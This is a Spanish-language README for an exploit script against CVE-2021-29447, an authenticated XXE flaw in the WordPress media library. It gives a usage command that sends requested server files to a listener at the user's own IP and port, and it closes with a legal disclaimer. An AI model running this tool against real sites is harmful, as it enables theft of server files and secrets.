
Explotar la inyección de entidades externas XML (XXE) en la biblioteca multimedia de WordPress para exfiltrar archivos.
Explota la inyección de entidades externas (XXE) autenticada en la librería de medios de WordPress para exfiltrar archivos.
Parcheado en WordPress 5.7.1.
Requiere credenciales válidas de WordPress para interactuar con la librería de medios.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
El script pedirá la ruta del archivo y devolverá el archivo solicitado.
Inspirado en el script de David Utón (M3n0sD0n4ld) ExploitDB.
El uso de esto para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por ningún uso indebido o daño causado por este programa. Úselo solo con fines educativos.
Este script se publica bajo la Licencia MIT.